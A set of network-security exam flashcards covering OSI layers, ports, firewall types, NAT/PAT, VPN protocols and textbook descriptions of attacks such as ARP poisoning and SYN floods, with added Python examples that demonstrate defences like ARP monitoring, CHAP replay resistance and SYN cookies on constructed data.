Chapter 4: Communication and Network Security Flashcards
multihomed firewall
Multihomed firewalls (a host with more than one network interface) may be used to set up a DMZ with a single firewall. (see next slide)
On any multihomed machine that is not meant to act as a router, IP forwarding should be disabled so it cannot silently bridge the networks it touches.*
802.11 wireless protocols
- 802.11a: 54 Mbps, 5 GHz, 8 channels
- 802.11b: 11 Mbps, 2.4 GHz (same band as other home devices)
- 802.11g: 54 Mbps, 2.4 GHz
- 802.11i: wireless with security; first standard to require WPA2
- 802.11n: 100+ Mbps, 2.4 GHz or 5 GHz
802.15
Bluetooth
802.1x and eap
802.1X is port-based network access control at Layer 2 for both wired and wireless networks: the switch or access point keeps the port closed to everything except authentication traffic until the client (supplicant) proves who it is.
- It carries EAP. EAP is an authentication framework that describes many specific authentication methods (EAP-TLS, PEAP, etc.) rather than one fixed method.
ad-hoc and infrastructure wireless
Ad hoc: wireless cards talk directly to other wireless cards (peer to peer, no access point). Infrastructure: clients connect through access points.
Application Proxies - Firewallpros & cons?
Like circuit-level proxies, but they actually understand the application/protocol they are proxying. This allows for additional security, as they can inspect the data for protocol violations or content.
Advantages
- Application proxies understand the protocol, so they can add extra security
- Can have advanced logging/auditing and access control features
- Ex. restrict users to only allowed web sites
- Ex. inspect data for protocol violations
- Ex. inspect data for malware (viruses etc.)
Disadvantages
- Extra processing requires extra CPU (slower)
- Proxies ONLY understand the protocols they were written to understand, so you generally need a separate application proxy for EACH protocol you want to proxy
Examples: SMTP proxies, FTP proxies
ARP
"Who has 192.168.1.2? Tell me its MAC address." Answer: "192.168.1.2 is at 00:af:14:b3:bc:12."
Works at Layer 2 but takes the IP address from Layer 3; for the test, say Layer 2.
Maps an IP address to a MAC address via a broadcast request on the local segment.
The answer is then added to the ARP cache.
ARP poisoning: the attacker sends forged (often unsolicited) ARP replies so the victim's cache maps the gateway's or server's IP address to the attacker's MAC, redirecting traffic through the attacker (man in the middle). ARP has no authentication, so any host on the segment can answer.
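The ARP poisoning card above describes a cache being overwritten by a forged reply. The following is an added example (not part of the original flashcards) that tracks IP-to-MAC bindings the way a small ARP monitor would and flags two symptoms: an IP whose MAC changes, and one MAC answering for several IPs. The ARP replies are constructed sample data, not captured traffic.

```python
"""Added example: watch ARP replies and flag IP-to-MAC binding changes.

Not from the original flashcards. The ARP replies below are constructed
sample data, not captured traffic.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str
    sender_mac: str


@dataclass
class ArpCacheMonitor:
    """Mimics an ARP cache but remembers the first MAC seen per IP and
    records an alert when a later reply claims a different MAC."""
    cache: dict = field(default_factory=dict)
    macs_to_ips: dict = field(default_factory=lambda: defaultdict(set))
    alerts: list = field(default_factory=list)

    def observe(self, reply: ArpReply) -> bool:
        """Record a reply; return True if it looks like poisoning."""
        self.macs_to_ips[reply.sender_mac].add(reply.sender_ip)
        known = self.cache.get(reply.sender_ip)
        if known is None:
            # First binding for this IP: trust it, as a real ARP cache would.
            self.cache[reply.sender_ip] = reply.sender_mac
            return False
        if known != reply.sender_mac:
            # Same IP now claims a different MAC: classic gateway takeover.
            self.alerts.append((reply.sender_ip, known, reply.sender_mac))
            return True
        return False

    def greedy_macs(self, threshold: int = 2) -> list:
        """MACs answering for several IPs at once (one attacker spoofing many hosts)."""
        return sorted(mac for mac, ips in self.macs_to_ips.items() if len(ips) >= threshold)


# Constructed sample traffic: the gateway answers for .1, then an attacker
# (00:de:ad:be:ef:01) claims both the gateway and a file server.
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "00:11:22:33:44:55"),   # real gateway
    ArpReply("192.168.1.2", "00:af:14:b3:bc:12"),   # host from the flashcard
    ArpReply("192.168.1.1", "00:de:ad:be:ef:01"),   # poisoned gateway entry
    ArpReply("192.168.1.50", "00:de:ad:be:ef:01"),  # attacker also claims .50
]


def run_sample() -> ArpCacheMonitor:
    monitor = ArpCacheMonitor()
    for reply in SAMPLE_REPLIES:
        monitor.observe(reply)
    return monitor


if __name__ == "__main__":
    m = run_sample()
    for ip, old, new in m.alerts:
        print(f"ALERT {ip}: {old} -> {new}")
    print("MACs claiming multiple IPs:", m.greedy_macs())
```

A real monitor would seed the cache from a known-good list (or DHCP leases) rather than trusting the first reply, because the attacker may simply be first; the first-seen rule here is what a plain ARP cache does and is exactly the weakness being exploited.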
asymmetric dsl
Faster download than upload (the bandwidth is split unevenly in favor of downstream).
autonomous system: how many entities?
One: an autonomous system (AS) is a collection of networks under a single administrative control with one routing policy.
Blue Bugging
The most serious of the Bluetooth attacks.
- Allows full use of the phone
- Allows the attacker to make calls
- Can eavesdrop on calls
Blue Jacking
Sending unsolicited messages (spam) to Bluetooth devices.
Blue Snarfing
Copies information (contacts, calendar, etc.) off remote Bluetooth devices without the owner's knowledge.
Bonk
Similar to Teardrop: manipulates how a PC reassembles fragmented packets (overlapping or oversized fragments) so the reassembled packet is too large, crashing the host.
Buffer Overflow
Attacks a specific type of memory on a system: the buffers. More data is written than the buffer can hold, overwriting adjacent memory (such as return addresses). Best avoided with input validation and bounds checking.
CHAP
CHAP does not expose the cleartext password on the wire and is not susceptible to simple replay attacks, because the server issues a fresh random challenge each time. CHAP relies on a shared secret: the password. The password is securely created (such as during account enrollment) and stored on the CHAP server. Since both the user and the CHAP server share a secret (the plaintext password), they can use that secret to securely authenticate.
circuit Switching
All data follows the same path (a dedicated circuit). Examples: PSTN, ISDN, DSL, T-carriers.
Data Diddling
Altering/manipulating data, usually before or during entry into a system.
DCE
Similar to Kerberos; developed by the Open Group. The Distributed Computing Environment (DCE) is a software system developed in the early 1990s by a consortium that included Apollo Computer (later part of Hewlett-Packard), IBM, Digital Equipment Corporation and others. DCE supplies a framework and toolkit for developing client/server applications.
DDos
Uses control machines (handlers) and zombies (bots): many compromised machines making the attack at once.
Dial up protocol
PPP (Point-to-Point Protocol): provides Layer 2 framing for dial-up. Needs other protocols for security.
Encryption: MPPE
Authentication:
- PAP (Password Authentication Protocol): cleartext
- CHAP (Challenge Handshake Authentication Protocol): the client responds to a challenge from the server; the only way the client can answer correctly is if the correct password was entered
- EAP (Extensible Authentication Protocol): extends capabilities beyond passwords (smart cards, biometrics, token devices, etc.)
DMZ
A buffer zone between an unprotected network and a protected network that allows for the monitoring and regulation of traffic between the two.
DNS port
UDP port 53 for normal queries; TCP port 53 for large answers, e.g. zone transfers (AXFR).
Dos
Denial of Service - overwhelm a system and disrupt its availability
DSL
Layer 1 (physical): a last-mile technology, not a protocol that provides security.
Dynamic Packet Filtering Firewalls
Like a stateful firewall but more advanced: it can actually rewrite rules dynamically. Some protocols such as FTP have complex communications that require multiple ports and connections for a single application session; packet filters and stateful filters cannot handle these easily, but a dynamic packet filter can, because it creates rules on the fly as needed (e.g. opening the FTP data port only after seeing it negotiated on the control channel).
Ethernet
Layer 2 transports data via frames
Ethernet
Most common form of LAN networking; has the following characteristics:
- Shared media
- Broadcast and collision domains (see next slides)
- CSMA/CD
- Supports full duplex with a switch
- Defined by IEEE 802.3
Fraggle
Similar to Smurf but uses UDP (echo/chargen) instead of ICMP; a Layer 4 attack. Block directed broadcasts on routers to mitigate.
frame relay
Frame Relay is a packet-switched Layer 2 WAN protocol that provides no error recovery and focuses on speed. Higher-layer protocols carried by Frame Relay, such as TCP/IP, can be used to provide reliability. Frame Relay multiplexes multiple logical connections over a single physical connection to create virtual circuits; this shared-bandwidth model is an alternative to dedicated circuits such as T1s. A PVC (Permanent Virtual Circuit) is always connected, analogous to a real dedicated circuit like a T1. A Switched Virtual Circuit (SVC)
FTP
FTP uses TCP to guarantee delivery (and supports authentication).
vs
TFTP uses UDP: faster, but does not guarantee delivery and has no authentication.
http
port 80
https port
443
imap port
Internet Message Access Protocol, port 143
ICMP
Layer 3; used to troubleshoot and report error conditions.
ICMP, the "IP helper": the protocol behind echoing utilities like ping and traceroute.
Frequently exploited:
- Loki: hides data in the ICMP payload (not supposed to be there); a covert channel
- Ping of Death: an echo request that violates the MTU (maximum transmission unit) size
- Ping floods: lots of ping traffic
- Smurf: uses a spoofed source address (the target) and directed broadcasts to launch a DDoS
infrastructure as a service
The provider supplies the raw compute, storage and network in the cloud; the customer installs and manages its own operating systems and applications on top (vs. running them on local hardware).
IPsec
IPv4 has no built-in confidentiality; higher-layer protocols such as TLS are used to provide security. To address this lack of security at Layer 3, IPsec (Internet Protocol Security) was designed to provide confidentiality, integrity and authentication for both IPv4 and IPv6. IPsec is a suite of protocols; the major two are Encapsulating Security Payload (ESP), which encrypts and can also authenticate, and Authentication Header (AH), which provides integrity and authentication but no encryption.
IPv4
32 bit source and destination address
IPv6
128-bit source and destination addresses
ISDN
PRI (Primary Rate Interface) and BRI (Basic Rate Interface)
L2TP
Layer 2 Tunneling Protocol
- Cisco designed L2F to break free of dependence on IP networks, but kept it proprietary.
- L2TP was a combination of L2F and PPTP.
- Designed to be implemented in software solutions.
- THERE IS NO SECURITY with L2TP by itself. It MUST use IPsec to secure the tunnel (L2TP/IPsec).
L3 Firewall
Static Packet Filters: Base decisions on Source/Destination IP address and port
L5 Firewall
Stateful inspection: knows who initiated the session, so it can block unsolicited replies. Protocol-anomaly firewalls also sit here.
L7 Firewall
Application proxies/kernel proxies: make decisions on content, Active Directory integration, certificates, time, etc.
Land Attack
Creates a “circular reference” on a machine. Sends a packet where source and destination are the same.
Layer 1 Threats
Physical:
- Theft
- Unauthorized access
- Vandalism
- Sniffing (tapping the cable)
- Interference
- Data emanation
Layer 2 two sub layers
Data Link layer sublayers: MAC (Media Access Control) transfers data down to the physical layer; LLC (Logical Link Control) interfaces up to Layer 3 and handles error detection. Devices: switches and bridges. The Ethernet card and its MAC address.
Layer 3
Network layer: describes routing, i.e. moving data from a system on one LAN to a system on another. IP addresses and routers. Other protocols that "work" on this layer: ICMP (the IP "helper", e.g. ping), IGMP (Internet Group Management Protocol), IP itself; all protocols that start with "I" (except IMAP). Attacks at this layer: ping floods, pings of death, Loki, Smurf.
Layer 4
OSI Layer 4 (Transport): provides end-to-end data transport services and establishes a logical connection between two computer systems.
The "pony express"
Protocols used at Layer 4:
- TCP
- UDP
- SSL/TLS (discussed in the Cryptography chapter)
Layer 5
OSI Layer 5 (Session) – responsible for establishing a connection between two APPLICATIONS! (either on the same computer or two different computers)
- Create connection
- Transfer data
- Release connection
TCP provides session-oriented services.
The session layer manages sessions, which provide maintenance on connections between applications: RPCs; simplex, half duplex, full duplex.
Setup, maintenance and teardown of a session.
Layer 6
OSI Layer 6 Presentation Layer – presents the data in a format that all computers can understand
Think 3 things: Formating, Compression and Encryption
testable - This is the only layer of OSI that does NOT have any protocol.
- Concerned with encryption, compression and formatting
Making sure data is presented in a universal format
File level encryption
Removing redundancy from files (compression)
Presentation layer: presents data to the application. Concepts include data conversion, ASCII, and image formats (GIF, JPEG, TIFF).
Layer 7
APPLICATION Layer
This defines a protocol (way of sending data) that two different programs or applications understand.
- HTTP, HTTPS, FTP, TFTP, SMTP, SNMP, etc.
- Application Proxies
- Non-Repudiation
- Certificates
- Integration with Directory SErvices
- Time awareness.
- Applications: web browser, word processor, etc. Proxy firewalls
- Content Inspection
If you don't know which layer something application-related belongs to, try Layer 7, because there's a bunch there!
LEAP
Lightweight Extensible Authentication Protocol: Cisco proprietary; has known security flaws (its challenge/response can be cracked offline with a dictionary attack).
Least Secure Type of Cable
Twisted pair (UTP): easiest to tap and most susceptible to interference.
Logic Bomb
Malicious code that lies dormant until a logical event occurs (a date, a user being removed from payroll, etc.).
Logical Link Layer
L2 sublayer (LLC): error detection; interfaces the MAC sublayer to Layer 3.
Loki Attack
Information is hidden in the ICMP payload (covert channel).
MAC - Physical 1st Part
L2 (Data Link), MAC sublayer: Media Access Control addressing/resolution and media access determination.
- ARP (Address Resolution Protocol): IP to MAC
- RARP (Reverse Address Resolution Protocol): MAC to IP
MAC - Physical 2nd Part
L2 (Data Link), MAC sublayer: media access control methods.
- CSMA/CD (Carrier Sense Multiple Access with Collision Detection), 802.3 Ethernet: waits for the medium to be clear, then starts talking; backs off and retries on collision.
- CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance), 802.11 wireless: signals intent to talk before transmitting.
- Token passing: a 24-bit control frame is passed around the network to determine who can transmit.
MAN
Metropolitan area network
MPLS
Multiprotocol Label Switching
- MPLS is used to create cost-effective private Wide Area Networks (WANs) that are faster and more secure than regular routed "public" IP networks like the Internet.
- More secure than the public Internet, because a "virtual" private network (end-to-end circuit) can be built just for your organization.
- Since it is a private network, we don't have to configure and maintain traditional encryption-based VPN equipment, and can also avoid the latency and delay inherent in that technology. Caveat: MPLS separates traffic but does not encrypt it; the carrier can still see it.
- Provides QoS for VoIP.
- Operates between Layer 2 and Layer 3 (often called "Layer 2.5"): the label sits between the Layer 2 header and the IP header.
NAT
One-to-one mapping of a private address to a public address (static NAT).
3 ranges of internal (RFC 1918) addresses:
- 192.168.0.0/16
- 10.0.0.0/8
- 172.16.0.0 to 172.31.255.255 (172.16.0.0/12)
PAT (port address translation) allows you to map many internal addresses to one external address by rewriting the source port as well.
Network Perimeter concept
Choke points: force all traffic between zones through a few controlled paths (firewalls) so it can be inspected and logged.
NIS
Network Information Service: a distributed database system that lets Unix computers share sets of files (passwd, group, hosts maps). Classic NIS hands its maps, including password hashes, to any client that asks, and does not support MD5 password hashes.
OSPF
Because RIP could not scale well in large networks, Open Shortest Path First (OSPF) was created. It is a link-state protocol that supports hierarchies (areas) and the simultaneous use of multiple equal-cost paths.
packet Filter
Uses access control lists (ACLs): rules that the firewall applies to each packet it receives.
- Not stateful; just looks at the network- and transport-layer headers (IP addresses, ports and "flags")
- **Does not look into the application; cannot block viruses etc.**
- Generally does not support anything advanced or custom
- Packet filters keep no state
Packet Switching
- X.25
- Frame Relay
- ATM
- VOIP
- MPLS
- Cable Modems
PAP
PAP (Password Authentication Protocol) is a very weak authentication protocol. It sends the username and password in cleartext. An attacker who is able to sniff the authentication process can launch a simple replay attack by replaying the username and password and using them to log in. PAP is insecure and should not be used.
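The CHAP and PAP cards above make the same point from two sides: a sniffed CHAP response is useless against the next challenge, while a sniffed PAP password works forever. The following is an added example, not part of the original flashcards, that runs both against a replay. The CHAP response is computed as RFC 1994 specifies (MD5 over identifier, shared secret and challenge); the user name, secret and server class are constructed for the example.

```python
"""Added example: CHAP challenge/response versus PAP under a replay attack.

Not from the original flashcards. The response is computed as in RFC 1994
(MD5 over identifier || secret || challenge); user names and secrets are
constructed sample values.
"""
import hashlib
import hmac
import os


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 CHAP: MD5(id || shared secret || challenge)."""
    return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


class ChapServer:
    def __init__(self, users: dict):
        self.users = users          # username -> plaintext shared secret
        self.pending = {}           # username -> (identifier, challenge)
        self.identifier = 0

    def challenge(self, username: str):
        """Issue a fresh random challenge; any older one becomes invalid."""
        self.identifier = (self.identifier + 1) & 0xFF
        chal = os.urandom(16)
        self.pending[username] = (self.identifier, chal)
        return self.identifier, chal

    def verify(self, username: str, identifier: int, response: bytes) -> bool:
        entry = self.pending.pop(username, None)   # a challenge is single use
        if entry is None or entry[0] != identifier or username not in self.users:
            return False
        expected = chap_response(identifier, self.users[username], entry[1])
        return hmac.compare_digest(expected, response)


def pap_login(users: dict, username: str, password_on_wire: bytes) -> bool:
    """PAP: the cleartext password itself is the credential on the wire."""
    return users.get(username) == password_on_wire


def replay_demo() -> tuple:
    """Returns (chap_first_login, chap_replay, pap_replay)."""
    users = {"alice": b"correct horse battery"}      # constructed credential
    server = ChapServer(users)

    # Legitimate CHAP login; the attacker sniffs identifier, challenge and response.
    ident, chal = server.challenge("alice")
    sniffed_response = chap_response(ident, users["alice"], chal)
    chap_first = server.verify("alice", ident, sniffed_response)

    # Attacker replays the sniffed response against a new challenge: it fails,
    # because both the identifier and the challenge have changed.
    server.challenge("alice")
    chap_replay = server.verify("alice", ident, sniffed_response)

    # PAP: the sniffed cleartext password works every time.
    sniffed_password = users["alice"]
    pap_replay = pap_login(users, "alice", sniffed_password)
    return chap_first, chap_replay, pap_replay


if __name__ == "__main__":
    print(replay_demo())
```

Note the caveat CHAP itself carries: the server must store the plaintext secret (not a hash) to compute the expected response, so the credential database is the crown jewel, and an attacker who captures challenge/response pairs can still run an offline dictionary attack on weak passwords.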
PAT
Multiple private addresses share one public address. PAT looks at the IP address and the transport-layer port number and rewrites both.*
Ping Flooding
Overwhelm a system with a multitude of pings (ICMP echo requests).
Ping of Death
Sending a ping packet that violates the maximum transmission unit: a huge, oversized packet (delivered as fragments that reassemble to more than 65,535 bytes). ICMP.
Platform as a service
Is all about application hosting: the provider runs the OS and runtime, and the customer deploys its own application onto it.
pop3 port
110
PPP
Layer 2 framing for point-to-point links. PPP itself provides no confidentiality, integrity or authentication; those come from the protocols it carries (MPPE for encryption, PAP/CHAP/EAP for authentication).
PPTP
Point-to-Point Tunneling Protocol
- Based on PPP (uses MPPE for encryption and PAP, CHAP or EAP for authentication)
- Microsoft-led protocol for a tunneling VPN
- Only works across IP networks
- The remote user connects to an ISP and gets an Internet address
- Establishes a VPN connection to the work VPN server and gets an internal IP address
- Sends private IP packets encrypted within other IP packets
Proxy Firewalls - Circuit Level pros & cons?
- A circuit-level gateway is a type of firewall. Circuit-level gateways work at the session layer of the OSI model, or as a "shim layer" between the application layer and the transport layer of the TCP/IP stack. They monitor the TCP handshake between hosts to determine whether a requested session is legitimate, but do not inspect the application data that flows inside it.
Application Proxies
advantages
- understand the protocol, so they can add extra security
- can have advanced logging/auditing and access control features
- ex. restrict users to only allowed web sites
- inspect data for protocol violations
- inspect data for malware
Disadvantages
- extra processing (slower)
- proxies only understand the protocols they were written to understand, so you generally need a separate application proxy for each protocol
Examples:
- Internet Security and Acceleration Server (Microsoft's web proxy)
- SMTP proxies
- FTP proxies
RDP
Remote Desktop Protocol: TCP port 3389
RFC 1918
- 10.x.x.x (10.0.0.0/8)
- 172.16.x.x to 172.31.x.x (172.16.0.0/12)
- 192.168.x.x (192.168.0.0/16)
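The NAT, PAT and RFC 1918 cards describe the rewrite in words; the following is an added example (not from the original flashcards) of a toy PAT table that checks the inside address is private, hands out a distinct public port per inside (ip, port, destination) tuple, and refuses return traffic that has no entry, which is exactly why an unsolicited inbound packet is dropped by a PAT device. Addresses and ports are constructed documentation values.

```python
"""Added example: RFC 1918 check and a toy PAT (port address translation) table.

Not from the original flashcards; addresses and ports are constructed.
"""
import ipaddress

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip: str) -> bool:
    """True if the address falls in one of the three private ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


class PatTable:
    """Many private (ip, port) pairs share one public IP; the source port is rewritten."""

    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        self.outbound_map = {}   # (src_ip, src_port, dst_ip, dst_port) -> public_port
        self.inbound_map = {}    # (public_port, dst_ip, dst_port) -> (src_ip, src_port)

    def translate_out(self, src_ip, src_port, dst_ip, dst_port):
        """Outbound packet: allocate (or reuse) a public port for this flow."""
        if not is_rfc1918(src_ip):
            raise ValueError(f"{src_ip} is not a private address; nothing to translate")
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.outbound_map:
            pub_port = self.next_port
            self.next_port += 1
            self.outbound_map[key] = pub_port
            self.inbound_map[(pub_port, dst_ip, dst_port)] = (src_ip, src_port)
        return self.public_ip, self.outbound_map[key]

    def translate_in(self, public_port, remote_ip, remote_port):
        """Return packet: reverse lookup; None means unsolicited, so drop it."""
        return self.inbound_map.get((public_port, remote_ip, remote_port))


def demo():
    pat = PatTable("203.0.113.7")   # TEST-NET-3 documentation address
    # Two internal hosts happen to pick the same source port; PAT keeps them apart.
    a = pat.translate_out("192.168.1.10", 51000, "198.51.100.20", 443)
    b = pat.translate_out("192.168.1.11", 51000, "198.51.100.20", 443)
    back_a = pat.translate_in(a[1], "198.51.100.20", 443)
    unsolicited = pat.translate_in(40999, "198.51.100.99", 80)
    return a, b, back_a, unsolicited
```

A real implementation also ages entries out (otherwise the table fills, a DoS vector noted on the stateful-firewall card) and checks the return packet's full 4-tuple, as done here, rather than the port alone.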
SAAS
Software as a Service: the provider runs the whole application. Office 365 online, for example: Word in the cloud.
Salami
Many small attacks add up to equal a large attack (e.g. skimming a fraction of a cent from every transaction).
The Office Space type of fraud.
screened subnet
In a screened subnet there is a separate firewall on each side of the DMZ. When using this model it is recommended that each firewall be a different vendor/product, so one vulnerability does not open both: diversity of defense.*
Security Zones - Firewall
- DMZ
- Bastion host: a hardened server exposed to the untrusted network
- Vendor diversity is good.
SIP
Session Initiation Protocol: consists of the user agent client and the user agent server; used for VoIP call setup and teardown.
smtp
Simple Mail Transfer Protocol, port 25
Smurf
Uses ICMP echo requests with a spoofed source address (the victim) sent to a directed broadcast address; every host on the amplifier network replies to the victim. L3 attack.
Block directed broadcasts on routers to stop it.
Sniffing
Capturing and viewing packets with a protocol analyzer; the best defense is encryption.
Socket
When a TCP or UDP message is formed, a source and a destination port are placed in the header along with the source and destination IP addresses; an IP address paired with a port number makes a socket.
ssh
port 22
Stateful Firewall
Layer 5
- The firewall keeps track of connections in a state table: it knows which conversations are active, who is involved, etc.
- It allows return traffic back in automatically, where a packet filter would need a specific rule to permit returned traffic.
- More complex, and an attacker can launch a DoS against it by trying to fill up all the entries in the state table / use up memory.
- If rebooted, the state table is lost and conversations that had been in progress are disrupted.
Context-dependent access control*
stateful firewall
Layer 5
Stateful firewalls have a state table that allows the firewall to compare current packets to previous ones. Stateful firewalls are slower than packet filters, but are far more secure. Computer 1 sends an ICMP Echo Request to
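The packet filter, stateful firewall and "unsolicited reply" cards all hinge on the same idea: without memory of who started a session, a filter has to permit return traffic with a blanket rule that an attacker's packets can satisfy. The following is an added example, not part of the original flashcards, that runs the same constructed packets through a static filter and a stateful one. The inside network is assumed to be 10.0.0.0/8 and the outside addresses are documentation ranges.

```python
"""Added example: a stateless ACL versus a stateful firewall on the same packets.

Not from the original flashcards. Packets and addresses are constructed;
the "inside" network is 10.0.0.0/8 by assumption.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str      # TCP flags as letters: "S", "SA", "A", "R", "F"


def is_inside(ip: str) -> bool:
    return ip.startswith("10.")


class StatelessFilter:
    """Static packet filter. With no memory it must permit return traffic via a
    blanket rule ("anything with ACK set"), which unsolicited packets satisfy."""

    def allow(self, pkt: Packet) -> bool:
        if is_inside(pkt.src):
            return True                 # outbound is permitted
        return "A" in pkt.flags         # the "established" hack


class StatefulFirewall:
    def __init__(self):
        self.table = set()              # 4-tuples of sessions opened from inside

    def allow(self, pkt: Packet) -> bool:
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if fwd in self.table or rev in self.table:
            if "R" in pkt.flags or "F" in pkt.flags:
                self.table.discard(fwd)   # session teardown frees the entry
                self.table.discard(rev)
            return True
        if is_inside(pkt.src) and pkt.flags == "S":
            self.table.add(fwd)         # a new outbound SYN creates state
            return True
        return False                    # unsolicited: no matching state


# Constructed sample traffic.
SAMPLE = [
    Packet("10.0.0.5", 50000, "203.0.113.10", 443, "S"),    # inside opens a session
    Packet("203.0.113.10", 443, "10.0.0.5", 50000, "SA"),   # legitimate reply
    Packet("198.51.100.9", 443, "10.0.0.5", 50001, "SA"),   # unsolicited reply
    Packet("198.51.100.9", 1234, "10.0.0.5", 22, "A"),      # ACK-scan probe
    Packet("198.51.100.9", 1234, "10.0.0.5", 22, "S"),      # inbound SYN
]


def run_sample():
    """Returns (stateless_decisions, stateful_decisions) for SAMPLE, in order."""
    stateless, stateful = StatelessFilter(), StatefulFirewall()
    return [stateless.allow(p) for p in SAMPLE], [stateful.allow(p) for p in SAMPLE]
```

The two false entries in the stateful column are the "unsolicited reply" and the ACK scan: both carry the ACK bit the static rule trusts, and neither matches a session the inside ever opened. The price is the state table itself, which is what a state-exhaustion DoS targets.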
stateless firewall layer
3 (it decides on IP addresses, ports and flags from the network- and transport-layer headers, with no memory of earlier packets).
Switch
A network switch is just a multiport bridge. Switches often have 24 or more ports and learn which MAC addresses are on which ports.
Works at Layer 2 (data link).
On a switch a computer can send data AND receive data at the same time (full duplex, increasing performance by up to 2x).
On a switch each port is its own collision domain, so there are no collisions, allowing line-speed communication on each port. A switch does not alter broadcast domains.
A switch only sends traffic from the sending computer to the receiving computer, which defeats casual sniffing (watch for MAC flooding, which can make a switch fall back to flooding every port, and for ARP spoofing).
Since switches inspect the MAC address on all traffic, a switch can be configured (port security) to only allow certain MAC addresses to communicate and ignore other MAC addresses.
Syn Flood
Exploits the TCP three-way handshake (Layer 4): the attacker sends many SYNs, often from spoofed sources, and never completes the handshake, so the server's half-open connection backlog fills up. Mitigate with SYN cookies, backlog tuning, or a stateful firewall/proxy that completes the handshake on the server's behalf.
Syn Flood
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Layer 4 attack.
TCP
Transmission Control Protocol: connection-oriented, "guaranteed" delivery.
***Advantages
- Easier to program with
- Truly implements a session
- Adds some protection (sequence numbers make blind injection harder)
***Disadvantages
- More overhead / slower
- SYN floods
KNOW the OSI model and the mapping of protocols to layers...
TCP - Handshake
Reliable, connection-oriented protocol. Delivery is guaranteed by sequence numbers and acknowledgements; the connection is set up by the three-way handshake:
Client -> Server: SYN ("hey, open an area in memory for me")
Server -> Client: SYN/ACK
Client -> Server: ACK
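The handshake above is what a SYN flood abuses: the server reserves memory at step 1 and the attacker never sends step 3. The following is an added example, not from the original flashcards, that shows the half-open backlog being exhausted and then the SYN-cookie defense, where the server keeps no state and instead encodes a keyed hash into the initial sequence number of its SYN/ACK; a valid final ACK proves the client really received it. The cookie layout (5-bit time counter, 3-bit MSS index, 24-bit hash) follows the classic Bernstein scheme; the secret, addresses and timings are constructed.

```python
"""Added example: half-open backlog exhaustion versus SYN cookies.

Not from the original flashcards. The cookie layout follows the classic
Bernstein scheme (5-bit time counter, 3-bit MSS index, 24-bit keyed hash);
addresses, secret and timings are constructed.
"""
import hashlib
import hmac


class ClassicBacklog:
    """Server keeps per-SYN state; a flood of spoofed SYNs fills it."""

    def __init__(self, max_half_open: int):
        self.max_half_open = max_half_open
        self.half_open = set()

    def on_syn(self, src: str, sport: int) -> bool:
        """Return False when the backlog is full and this SYN must be dropped."""
        if len(self.half_open) >= self.max_half_open:
            return False
        self.half_open.add((src, sport))
        return True


class SynCookieServer:
    """Server keeps no state: the ISN in the SYN/ACK encodes everything."""

    def __init__(self, secret: bytes):
        self.secret = secret

    def _hash24(self, src, sport, dst, dport, t) -> int:
        msg = f"{src}:{sport}>{dst}:{dport}@{t}".encode()
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:3], "big")

    def make_isn(self, src, sport, dst, dport, t, mss_index) -> int:
        """ISN placed in the SYN/ACK; t is a coarse (e.g. 64 s) time counter."""
        t5 = t & 0x1F
        return (t5 << 27) | ((mss_index & 0x7) << 24) | self._hash24(src, sport, dst, dport, t5)

    def check_ack(self, src, sport, dst, dport, now, ack_number):
        """Validate the final ACK; returns the MSS index, or None if forged or stale."""
        isn = (ack_number - 1) & 0xFFFFFFFF      # client ACKs our ISN + 1
        t5 = isn >> 27
        mss_index = (isn >> 24) & 0x7
        if (now - t5) & 0x1F > 1:                 # older than one counter tick
            return None
        if (isn & 0xFFFFFF) != self._hash24(src, sport, dst, dport, t5):
            return None
        return mss_index


def demo():
    """Returns (legit_got_slot_during_flood, cookie_ok, cookie_forged, cookie_stale)."""
    backlog = ClassicBacklog(max_half_open=128)
    for i in range(128):                                   # spoofed SYNs, never ACKed
        backlog.on_syn(f"198.51.100.{i % 250}", 1000 + i)
    legit_got_slot = backlog.on_syn("203.0.113.5", 40000)  # real client is refused

    srv = SynCookieServer(b"rotate-me-regularly")
    args = ("203.0.113.5", 40000, "10.0.0.1", 80)
    isn = srv.make_isn(*args, t=7, mss_index=3)
    cookie_ok = srv.check_ack(*args, now=7, ack_number=isn + 1)
    cookie_forged = srv.check_ack(*args, now=7, ack_number=(isn ^ 1) + 1)
    cookie_stale = srv.check_ack(*args, now=12, ack_number=isn + 1)
    return legit_got_slot, cookie_ok, cookie_forged, cookie_stale
```

The trade-off is visible in the bit layout: only 24 bits of hash and 3 bits of MSS survive, so cookies are normally switched on only when the backlog is under pressure, and options like window scaling negotiated in the SYN are lost.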
TCP Sequence Number
Numbers every byte sent so the receiver can acknowledge, reorder and detect missing segments; hard-to-guess initial sequence numbers also make blind spoofing and session hijacking harder.
TCP/IP Protocols
UDP (User Datagram Protocol), ICMP (Internet Control Message Protocol), etc.
Tear Drop
Sending malformed (overlapping) IP fragments which the OS doesn't know how to reassemble. A Layer 3 (IP fragmentation) attack.
telnet
tcp port 23
Trojan Horse
A program (usually malicious code) that masquerades as another. A common means of distributing back-door programs.
types of EAP
LEAP, EAP-TLS, EAP-TTLS and PEAP
udp
User Datagram Protocol: for loss-tolerant, real-time applications.
UDP
User Datagram Protocol:
- Connectionless
- Unreliable
- No handshaking
- Desirable when “real time” transfer is essential
- Media streaming, gaming, real-time chat, etc.
- FTP uses TCP
- TFTP uses UDP
unsolictated Reply
Sending a reply to a question that was never asked, e.g. a forged ARP reply or a SYN/ACK with no preceding SYN. A stateful firewall drops these because no session matches.
Virus
A piece of malicious code that can take many forms.
Needs a host, and action by user to spread.
VNC port #
Virtual Network Computing: TCP port 5900
VOIP Security Issues
